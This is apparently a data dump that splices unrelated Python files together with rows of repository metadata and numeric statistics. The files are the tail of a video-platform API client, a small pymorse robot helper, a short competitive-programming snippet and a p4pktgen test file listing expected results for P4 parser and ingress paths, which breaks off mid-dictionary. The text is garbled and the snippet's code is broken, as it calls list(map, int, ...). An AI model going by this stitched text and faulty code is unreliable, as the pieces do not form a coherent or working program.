owner_id=None):
api_request = APIRequest('GetMessageCallback', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"AppId": app_id,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_video_info(
self,
resource_owner_id=None,
resource_owner_account=None,
description=None,
video_id=None,
owner_id=None,
title=None,
tags=None,
cover_url=None,
download_switch=None,
cate_id=None,
custom_media_info=None,
status=None):
api_request = APIRequest('UpdateVideoInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Description": description,
"VideoId": video_id,
"OwnerId": owner_id,
"Title": title,
"Tags": tags,
"CoverURL": cover_url,
"DownloadSwitch": download_switch,
"CateId": cate_id,
"CustomMediaInfo": custom_media_info,
"Status": status}
return self._handle_request(api_request).result
def get_video_play_auth(
self,
resource_owner_id=None,
resource_owner_account=None,
re_auth_info=None,
play_config=None,
auth_info_timeout=None,
video_id=None,
owner_id=None):
api_request = APIRequest('GetVideoPlayAuth', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ReAuthInfo": re_auth_info,
"PlayConfig": play_config,
"AuthInfoTimeout": auth_info_timeout,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_video_list(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
page_no=None,
page_size=None,
end_time=None,
sort_by=None,
start_time=None,
owner_id=None,
status=None,
storage_location=None):
api_request = APIRequest('GetVideoList', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"PageNo": page_no,
"PageSize": page_size,
"EndTime": end_time,
"SortBy": sort_by,
"StartTime": start_time,
"OwnerId": owner_id,
"Status": status,
"StorageLocation": storage_location}
return self._handle_request(api_request).result
def get_video_info(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
addition_type=None,
result_types=None,
owner_id=None):
api_request = APIRequest('GetVideoInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"AdditionType": addition_type,
"ResultTypes": result_types,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_video(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('DeleteVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def refresh_upload_video(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
owner_id=None):
api_request = APIRequest('RefreshUploadVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def create_upload_video(
self,
resource_owner_id=None,
resource_owner_account=None,
transcode_mode=None,
ip=None,
description=None,
file_size=None,
owner_id=None,
title=None,
tags=None,
storage_location=None,
cover_url=None,
user_data=None,
file_name=None,
template_group_id=None,
cate_id=None,
app_id=None,
workflow_id=None,
custom_media_info=None):
api_request = APIRequest('CreateUploadVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TranscodeMode": transcode_mode,
"IP": ip,
"Description": description,
"FileSize": file_size,
"OwnerId": owner_id,
"Title": title,
"Tags": tags,
"StorageLocation": storage_location,
"CoverURL": cover_url,
"UserData": user_data,
"FileName": file_name,
"TemplateGroupId": template_group_id,
"CateId": cate_id,
"AppId": app_id,
"WorkflowId": workflow_id,
"CustomMediaInfo": custom_media_info}
return self._handle_request(api_request).result
| 37.626984
| 99
| 0.583128
| 8,132
| 85,338
| 5.747787
| 0.069233
| 0.068591
| 0.053893
| 0.064183
| 0.81911
| 0.798314
| 0.768126
| 0.730472
| 0.705569
| 0.67337
| 0
| 0.000276
| 0.321709
| 85,338
| 2,267
| 100
| 37.643582
| 0.807218
| 0.006738
| 0
| 0.766588
| 0
| 0
| 0.151683
| 0.013593
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059294
| false
| 0
| 0.001412
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e61465b89e9c57fb6877ea067218718787bc567f
| 132
|
py
|
Python
|
crash_generator/manual_connector/manual_connector.py
|
donlelef/robot
|
5aeedaa05117bbb0f766167ae66ade143e0e91ea
|
[
"MIT"
] | null | null | null |
crash_generator/manual_connector/manual_connector.py
|
donlelef/robot
|
5aeedaa05117bbb0f766167ae66ade143e0e91ea
|
[
"MIT"
] | null | null | null |
crash_generator/manual_connector/manual_connector.py
|
donlelef/robot
|
5aeedaa05117bbb0f766167ae66ade143e0e91ea
|
[
"MIT"
] | null | null | null |
from pymorse import Morse
from crash_generator.robot.robot import Robot
def get_robot():
return Robot(Morse().robot, Morse())
| 18.857143
| 45
| 0.757576
| 19
| 132
| 5.157895
| 0.526316
| 0.204082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143939
| 132
| 6
| 46
| 22
| 0.867257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
e62da4e25b3cdb1f4a0a2340600fb2c0ef7b1b7b
| 146
|
py
|
Python
|
ABC151-200/ABC196/abc196_e.py
|
billyio/atcoder
|
9d16765f91f28deeb7328fcc6c19541ee790941f
|
[
"MIT"
] | 1
|
2021-02-01T08:48:07.000Z
|
2021-02-01T08:48:07.000Z
|
ABC151-200/ABC196/abc196_e.py
|
billyio/atcoder
|
9d16765f91f28deeb7328fcc6c19541ee790941f
|
[
"MIT"
] | null | null | null |
ABC151-200/ABC196/abc196_e.py
|
billyio/atcoder
|
9d16765f91f28deeb7328fcc6c19541ee790941f
|
[
"MIT"
] | null | null | null |
N = int(input())
at = [list(map, int, input().split()) for _ in range(N)]
Q = int(input())
x = list(map, int, input().split())
# for _ in range(s
| 24.333333
| 56
| 0.582192
| 26
| 146
| 3.192308
| 0.5
| 0.385542
| 0.240964
| 0.361446
| 0.722892
| 0.722892
| 0.722892
| 0.722892
| 0
| 0
| 0
| 0
| 0.171233
| 146
| 6
| 57
| 24.333333
| 0.68595
| 0.109589
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
05240770178f9265ab228d6c34327d704001fb47
| 34,458
|
py
|
Python
|
tests/check_system.py
|
iand-xilinx/p4pktgen
|
bc99dc7c797a72fa3469e052b38f77829db3eacd
|
[
"BSD-3-Clause"
] | null | null | null |
tests/check_system.py
|
iand-xilinx/p4pktgen
|
bc99dc7c797a72fa3469e052b38f77829db3eacd
|
[
"BSD-3-Clause"
] | null | null | null |
tests/check_system.py
|
iand-xilinx/p4pktgen
|
bc99dc7c797a72fa3469e052b38f77829db3eacd
|
[
"BSD-3-Clause"
] | null | null | null |
from p4pktgen.main import process_json_file
from p4pktgen.config import Config
from p4pktgen.core.translator import TestPathResult
class CheckSystem:
def check_demo1b(self):
Config().load_test_defaults()
results = process_json_file('examples/demo1b.json')
expected_results = {
('start', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (False, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (True, (u'demo1b.p4', 143, u'acl_drop')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_drop'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_8', (True, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'sink', (u'node_2', (False, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()')))):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_drop'), (u'node_4', (True, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act', u'act')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_8', (False, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET')))):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_8', (False, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET')))):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_8', (True, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo1b.p4', 141, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_acl', u'ingress.do_acl_permit'), (u'node_4', (False, (u'demo1b.p4', 143, u'acl_drop'))), (u'tbl_act_0', u'act_0'), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_8', (True, (u'demo1b.p4', 149, u'meta.fwd_metadata.l2ptr != L2PTR_UNSET'))), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.SUCCESS
}
assert results == expected_results
def check_demo1(self):
Config().load_test_defaults()
results = process_json_file(
'examples/demo1-action-names-uniquified.p4_16.json')
expected_results = {
('start', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr')):
TestPathResult.UNINITIALIZED_READ,
('start', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.my_drop1')):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'ingress.mac_da', u'ingress.my_drop2')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.my_drop1'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ipv4', 'sink', (u'ingress.ipv4_da_lpm', u'ingress.my_drop1'), (u'ingress.mac_da', u'ingress.my_drop2')):
TestPathResult.UNINITIALIZED_READ
}
assert results == expected_results
def check_demo1_no_uninit_reads(self):
Config().load_test_defaults()
results = process_json_file(
'examples/demo1-no-uninit-reads.p4_16.json')
expected_results = {
('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_5', (True, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_5', (False, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped')))):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_5', (True, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped'))), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_5', (True, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_5', (False, (u'demo1-no-uninit-reads.p4_16.p4', 123, u'!meta.fwd_metadata.dropped')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (False, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (True, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'sink', (u'tbl_demo1nouninitreads120', u'demo1nouninitreads120'), (u'node_3', (False, (u'demo1-no-uninit-reads.p4_16.p4', 121, u'hdr.ipv4.isValid()')))):
TestPathResult.SUCCESS
}
assert results == expected_results
def check_demo9b(self):
Config().load_test_defaults()
results = process_json_file('examples/demo9b.json')
expected_results = {
('start', 'parse_ethernet', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv4', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv4', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv4', 'parse_tcp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv4', 'parse_tcp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv4', 'parse_udp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv4', 'parse_udp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ethernet', 'parse_ipv6', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'parse_tcp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'parse_udp', 'sink', (u'node_2', (True, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6')))):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (False, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act_0', u'act_0')):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (True, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act', u'act')):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'parse_tcp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (False, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act_0', u'act_0')):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'parse_tcp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (True, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act', u'act')):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'parse_udp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (False, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act_0', u'act_0')):
TestPathResult.SUCCESS,
('start', 'parse_ethernet', 'parse_ipv6', 'parse_udp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (True, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act', u'act')):
TestPathResult.SUCCESS
}
assert results == expected_results
def check_config_table(self):
Config().load_test_defaults()
results = process_json_file('examples/config-table.json')
expected_results = {
('start', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.UNINITIALIZED_READ,
('start', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.SUCCESS,
('start', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.UNINITIALIZED_READ,
('start', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.UNINITIALIZED_READ
}
assert results == expected_results
def check_demo1_rm_header(self):
Config().load_test_defaults()
results = process_json_file(
'examples/demo1_rm_header.json')
expected_results = {
('start', 'parse_ipv4', 'sink', (u'tbl_demo1_rm_header83', u'demo1_rm_header83')):
TestPathResult.INVALID_HEADER_WRITE,
('start', 'sink', (u'tbl_demo1_rm_header83', u'demo1_rm_header83')):
TestPathResult.INVALID_HEADER_WRITE
}
assert results == expected_results
def check_add_remove_header(self):
Config().load_test_defaults()
results = process_json_file(
'examples/add-remove-header.json')
expected_results = {
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_4', (False, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.my_drop')):
TestPathResult.UNINITIALIZED_READ,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_4', (False, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.add_outer_ipv4'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.add_outer_ipv4'), (u'node_4', (False, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
TestPathResult.SUCCESS,
('start', 'parse_ipv4', 'sink', (u'node_2', (False, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'sink', (u'node_2', (False, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()')))):
TestPathResult.SUCCESS
}
assert results == expected_results
def check_checksum_ipv4_with_options(self):
Config().load_test_defaults()
# This test case exercises variable-length extract, lookahead,
# and verify statements in the parser.
results = process_json_file(
'examples/checksum-ipv4-with-options.json')
expected_results = {
('start', u'parse_ipv4', u'parse_tcp', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()'))), (u'node_3', (True, (u'checksum-ipv4-with-options.p4', 130, u'hdr.ipv4.ihl == 14')))):
TestPathResult.SUCCESS,
('start', u'parse_ipv4', u'parse_tcp', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()'))), (u'node_3', (False, (u'checksum-ipv4-with-options.p4', 130, u'hdr.ipv4.ihl == 14'))), (u'cIngress.guh', u'cIngress.foo')):
TestPathResult.SUCCESS,
('start', u'parse_ipv4', u'parse_tcp', 'sink', (u'node_2', (False, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', u'parse_ipv4', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', u'parse_ipv4', 'sink', (u'node_2', (False, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
TestPathResult.SUCCESS,
('start', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'sink', (u'node_2', (False, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
TestPathResult.SUCCESS
}
assert results == expected_results
def check_parser_impossible_transitions(self):
Config().load_test_defaults()
# This test case has at least one parser path that is
# impossible to traverse, and several that are possible that,
# when taken, make certain paths through ingress impossible.
# Note that there are no test cases containing the state
# parse_unreachable_state in the parser paths.
results = process_json_file(
'examples/parser-impossible-transitions.json')
expected_results = {
('start', 'parse_good', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_good', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_3', (False, (u'parser-impossible-transitions.p4', 93, u'hdr.ethernet.etherType_lsb == 4')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_good', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_3', (True, (u'parser-impossible-transitions.p4', 93, u'hdr.ethernet.etherType_lsb == 4'))), (u'tbl_parserimpossibletransitions94', u'parserimpossibletransitions94')):
TestPathResult.SUCCESS,
('start', 'parse_bad4', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
TestPathResult.NO_PACKET_FOUND,
('start', 'parse_bad4', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
TestPathResult.SUCCESS,
('start', 'parse_bad4', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
